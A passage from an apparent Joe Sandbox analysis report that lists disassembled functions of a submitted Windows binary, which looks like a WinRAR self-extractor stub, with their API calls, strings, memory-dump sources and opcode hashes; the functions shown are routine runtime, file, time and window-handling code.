GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0059948A

Part of subcall function 005A17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0059BB05,00000000,.exe,?,?,00000800,?,?,005A85DF,?), ref: 005A17C2

_swprintf.LIBCMT ref: 00599526

Part of subcall function 0059400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0059401D

MoveFileW.KERNEL32(?,?), ref: 00599595
MoveFileW.KERNEL32(?,?), ref: 005995D5

Strings

rtmp%d, xrefs: 0059950F

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
String ID: rtmp%d
API String ID: 2111052971-3303766350
Opcode ID: 54a70fb686c745ce3873caa11de79a503df7301a1dd42da7cc29d74979ce1854
Instruction ID: 77955a1adbfda80ad7e21a36a7338dc6b01edc817524154090a037890090f1ec
Opcode Fuzzy Hash: 54a70fb686c745ce3873caa11de79a503df7301a1dd42da7cc29d74979ce1854
Instruction Fuzzy Hash: 7441527290015A66DF20EB65CC89EEE7B7CBF55380F0044A9B549E3042EB749F89DB64

Function 005A8E62 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 125memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 005A8F38
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 005A8F59
CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 005A8F80

Strings

<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 005A8EB2
utf-8"></head>, xrefs: 005A8EBD
<html>, xrefs: 005A8EA7, 005A8EE0
</html>, xrefs: 005A8F0A

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: Global$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 4094277203-4209811716
Opcode ID: 857ca3de035703609de1ee135f3d520903f7adf0fcd9dc7d85482dbe5d668d01
Instruction ID: 0beeb2c3d062e9211a7549a6c87c7711efab78abf2b7707fc75fdc96c03b3e5b
Opcode Fuzzy Hash: 857ca3de035703609de1ee135f3d520903f7adf0fcd9dc7d85482dbe5d668d01
Instruction Fuzzy Hash: 8D3106315083176FD724AB649C4AFBFBF68BF92760F144519F801A61C1EF64A909C3A5

Function 005B8FA5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,005D0EE8,005B3E14,005D0EE8,?,?,005B3713,00000050,?,005D0EE8,00000200), ref: 005B8FA9
_free.LIBCMT ref: 005B8FDC
_free.LIBCMT ref: 005B9004
SetLastError.KERNEL32(00000000,?,005D0EE8,00000200), ref: 005B9011
SetLastError.KERNEL32(00000000,?,005D0EE8,00000200), ref: 005B901D
_abort.LIBCMT ref: 005B9023

Strings

X\, xrefs: 005B8FF7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID: X\
API String ID: 3160817290-3186185854
Opcode ID: 8a979c1b6d6a5a61d64a22d65d3d08d42096487ee88df8926b71673ef1abfb55
Instruction ID: 91c716196d8c6866af25676f6dfc67a41a25bd42a07769845a61de83fd97c936
Opcode Fuzzy Hash: 8a979c1b6d6a5a61d64a22d65d3d08d42096487ee88df8926b71673ef1abfb55
Instruction Fuzzy Hash: 34F0D136504A12AACB2233256C0FFFB2E5EBBE1764B341014F515A2192EF20F901E114

Function 005A0A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 005A0A9D

Part of subcall function 0059ACF5: GetVersionExW.KERNEL32(?), ref: 0059AD1A

FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 005A0AC0
FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 005A0AD2
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 005A0AE3
SystemTimeToFileTime.KERNEL32(?,?), ref: 005A0AF3
SystemTimeToFileTime.KERNEL32(?,?), ref: 005A0B03
FileTimeToSystemTime.KERNEL32(?,?), ref: 005A0B3D
__aullrem.LIBCMT ref: 005A0BCB

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 1282ace635c5f6c7e5eed97df3c11665e2ced946f12f32c9283d8f73fe7ba04b
Instruction ID: 5d00c049e03a22fe55cf69ebdb6e272b7de319eba60b29b6f3a273eaf0b47048
Opcode Fuzzy Hash: 1282ace635c5f6c7e5eed97df3c11665e2ced946f12f32c9283d8f73fe7ba04b
Instruction Fuzzy Hash: 0F413AB240830A9FC710DF64C88496FFBF8FB88714F044A2EF59692650E735E648DB62

Function 005BEE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,005BF5A2,?,00000000,?,00000000,00000000), ref: 005BEE6F
__fassign.LIBCMT ref: 005BEEEA
__fassign.LIBCMT ref: 005BEF05
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 005BEF2B
WriteFile.KERNEL32(?,?,00000000,005BF5A2,00000000,?,?,?,?,?,?,?,?,?,005BF5A2,?), ref: 005BEF4A
WriteFile.KERNEL32(?,?,00000001,005BF5A2,00000000,?,?,?,?,?,?,?,?,?,005BF5A2,?), ref: 005BEF83

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 4373bd50f50942f7dd4841f83a0b57b5a455ba99ef43e0dfc1d4bb0cb0de7f4a
Instruction ID: e2280debb3b9dee0691864323fa839cdfaff3f77a55f2bd42d1d9eb6eb706603
Opcode Fuzzy Hash: 4373bd50f50942f7dd4841f83a0b57b5a455ba99ef43e0dfc1d4bb0cb0de7f4a
Instruction Fuzzy Hash: 1A519E71A006099FDB10CFA8D886AEEBBB9FF19310F28451AE555E7291E730A940CB60

Function 005AC534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 005AC54A
_swprintf.LIBCMT ref: 005AC57E

Part of subcall function 0059400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0059401D

SetDlgItemTextW.USER32(?,00000066,005D946A), ref: 005AC59E
_wcschr.LIBVCRUNTIME ref: 005AC5D1
EndDialog.USER32(?,00000001), ref: 005AC6B2

Strings

%s%s%u, xrefs: 005AC573

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
String ID: %s%s%u
API String ID: 2892007947-1360425832
Opcode ID: 0fd73ca53625bc04306fc39623ea07e8135413100f4c274d4bb3408a68a15224
Instruction ID: 8e79f9d764ba1745b855e16e43bfcb4930c9f4f54bd7b1b25395eab5435eb91d
Opcode Fuzzy Hash: 0fd73ca53625bc04306fc39623ea07e8135413100f4c274d4bb3408a68a15224
Instruction Fuzzy Hash: D8417D75D00618AADF26DBA4DC49EEE7FBCBB59305F0040A6E509E7061EB719AC8CB50

Function 005A9635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 005A964E
GetWindowRect.USER32(?,00000000), ref: 005A9693
ShowWindow.USER32(?,00000005,00000000), ref: 005A972A
SetWindowTextW.USER32(?,00000000), ref: 005A9732
ShowWindow.USER32(00000000,00000005), ref: 005A9748

Strings

RarHtmlClassName, xrefs: 005A96F4

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 5b8799972b4d57d9043fd541d6607fd814aaa1dc7b9c0dfd0345a9842a9da579
Instruction ID: 084aaaca985f7d6d71fc3e74b87f2e2f92b3d356566e7604f02ae2fcdc37d637
Opcode Fuzzy Hash: 5b8799972b4d57d9043fd541d6607fd814aaa1dc7b9c0dfd0345a9842a9da579
Instruction Fuzzy Hash: 6331AE71004220AFCB119F64DD4DF6F7FA8FF49701F008559FA499A162CB38D958DBA5

Function 005BBFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005BBF79: _free.LIBCMT ref: 005BBFA2

_free.LIBCMT ref: 005BC003

Part of subcall function 005B84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,005BBFA7,005C3958,00000000,005C3958,00000000,?,005BBFCE,005C3958,00000007,005C3958,?,005BC3CB,005C3958), ref: 005B84F4
Part of subcall function 005B84DE: GetLastError.KERNEL32(005C3958,?,005BBFA7,005C3958,00000000,005C3958,00000000,?,005BBFCE,005C3958,00000007,005C3958,?,005BC3CB,005C3958,005C3958), ref: 005B8506

_free.LIBCMT ref: 005BC00E
_free.LIBCMT ref: 005BC019
_free.LIBCMT ref: 005BC06D
_free.LIBCMT ref: 005BC078
_free.LIBCMT ref: 005BC083
_free.LIBCMT ref: 005BC08E

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction ID: a9d02f13b5433953f678d7ef440ac0a4c4c4f8d7ec4ccdbf2ba2600495ecb6c4
Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction Fuzzy Hash: 4B11F171540706F6EA20B771CD0BFEBBF9DBF84700F408855729966452DBA5F9048B90

Function 005B20CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,005B20C1,005AFB12), ref: 005B20D8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005B20E6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005B20FF
SetLastError.KERNEL32(00000000,?,005B20C1,005AFB12), ref: 005B2151

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: b0d8112e34758e7864c016f992925fd8cb1fc2f877880c10da92a7128aeb1d8e
Instruction ID: 4f30d172a7ef4132e7bf15afc1c2f3f88871a00bf5c992b5f7a5317757e316f5
Opcode Fuzzy Hash: b0d8112e34758e7864c016f992925fd8cb1fc2f877880c10da92a7128aeb1d8e
Instruction Fuzzy Hash: 7001D8321197126EE7642BB97C8A9EB2E88FB61774B210A29F210650E0EE117C45E254

Function 005B9029 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,005D0EE8,00000200,005B895F,005B58FE,?,?,?,?,0059D25E,?,02EC3560,00000063,00000004,0059CFE0,?), ref: 005B902E
_free.LIBCMT ref: 005B9063
_free.LIBCMT ref: 005B908A
SetLastError.KERNEL32(00000000,005C3958,00000050,005D0EE8), ref: 005B9097
SetLastError.KERNEL32(00000000,005C3958,00000050,005D0EE8), ref: 005B90A0

Strings

X\, xrefs: 005B907E

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: ErrorLast$_free
String ID: X\
API String ID: 3170660625-3186185854
Opcode ID: 8cad08b1cb694a195cebe124b861f8a220820d4de2a09b4b34d84ede3d53be6a
Instruction ID: 9169c5462fc1d2910eb331173717255398083366fcaa623e0340189d2c176693
Opcode Fuzzy Hash: 8cad08b1cb694a195cebe124b861f8a220820d4de2a09b4b34d84ede3d53be6a
Instruction Fuzzy Hash: C8014476505E0A6FC33237796C8EDFB2E2DBBE07753300024F605A2292EF20EC05A120

Function 005ADC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

Strings

AcquireSRWLockExclusive, xrefs: 005ADCC9
KERNEL32.DLL, xrefs: 005ADCB4
ReleaseSRWLockExclusive, xrefs: 005ADCD9

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: b198b03c17a7201cd8f377487445845870ecab039f980adf8a8acb4a01fb1754
Instruction ID: c47d9c51c146ff58130f165b1ef7ad2d9edeba51949b2a82d9eb804f0c8bbf58
Opcode Fuzzy Hash: b198b03c17a7201cd8f377487445845870ecab039f980adf8a8acb4a01fb1754
Instruction Fuzzy Hash: 6B01F9326427225F4F207EB45C95AAE5FB4BA53323364553EE503E3640EA55CC86E6B0

Function 005B8060 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 005B807E

Part of subcall function 005B84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,005BBFA7,005C3958,00000000,005C3958,00000000,?,005BBFCE,005C3958,00000007,005C3958,?,005BC3CB,005C3958), ref: 005B84F4
Part of subcall function 005B84DE: GetLastError.KERNEL32(005C3958,?,005BBFA7,005C3958,00000000,005C3958,00000000,?,005BBFCE,005C3958,00000007,005C3958,?,005BC3CB,005C3958,005C3958), ref: 005B8506

_free.LIBCMT ref: 005B8090
_free.LIBCMT ref: 005B80A3
_free.LIBCMT ref: 005B80B4
_free.LIBCMT ref: 005B80C5

Strings

\, xrefs: 005B8074

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: \
API String ID: 776569668-1951137136
Opcode ID: 0ff61c3e63efb93990c88bfa628476d6bc5a5b5ad018ac6676d93575bdd4978a
Instruction ID: 2e6b00219a4a2072ceac9f1e7d7344893018ebe95f30a06c5e4c3dd4b6d1c22f
Opcode Fuzzy Hash: 0ff61c3e63efb93990c88bfa628476d6bc5a5b5ad018ac6676d93575bdd4978a
Instruction Fuzzy Hash: A5F01D78801926CF8B116B56BD068B63E69F724764308560AF401DAA74CF39185AFFC9

Function 005A0CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 005A0D0D

Part of subcall function 0059ACF5: GetVersionExW.KERNEL32(?), ref: 0059AD1A

LocalFileTimeToFileTime.KERNEL32(?,005A0CB8), ref: 005A0D31
FileTimeToSystemTime.KERNEL32(?,?), ref: 005A0D47
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 005A0D56
SystemTimeToFileTime.KERNEL32(?,005A0CB8), ref: 005A0D64
SystemTimeToFileTime.KERNEL32(?,?), ref: 005A0D72

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 7b47bcc6e85a19b9405351cc8d21f4af61503cc5814f72e5fe1175d17d032eda
Instruction ID: fdcafb61a932a3d774f2cec31a340ac799c30fe17df431cf1a8c536fa824a57b
Opcode Fuzzy Hash: 7b47bcc6e85a19b9405351cc8d21f4af61503cc5814f72e5fe1175d17d032eda
Instruction Fuzzy Hash: D431937A91020EAECB00DFE5D8859EEBBB8FF58700B04455AE955E7210E730AA45CB65

Function 005A91B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 005A91D4
_memcmp.LIBVCRUNTIME ref: 005A91EB

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 8e7c03252db9c03fd0f0fec853ac5d55ef6c098789df663646aee863346471b0
Instruction ID: 46409ca1b4457c2fddbf924212c1c1eed185a565fb55be0f3100de3b4d45a361
Opcode Fuzzy Hash: 8e7c03252db9c03fd0f0fec853ac5d55ef6c098789df663646aee863346471b0
Instruction Fuzzy Hash: 4E2181B560011EBBEB059E94CC81F6F7FADBF92B84B108929FC099A201F270ED459790

Function 005AD2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 005AD2F2
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 005AD30C
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 005AD31D
TranslateMessage.USER32(?), ref: 005AD327
DispatchMessageW.USER32(?), ref: 005AD331
WaitForSingleObject.KERNEL32(?,0000000A), ref: 005AD33C

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: c4add2a97ba9797718367660c12852989065af0a71f983a93cc37befd765a190
Instruction ID: 5f397744d6a51dd9e9f797e915854f4a09714bef44bf809cb71b3e1e293a4403
Opcode Fuzzy Hash: c4add2a97ba9797718367660c12852989065af0a71f983a93cc37befd765a190
Instruction Fuzzy Hash: 88F01DB2A0111DBBCB206BA5DC4CDEFBF7DEF62351F008412B606D2010DA388545D6B1

Function 005AC40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 005AC435

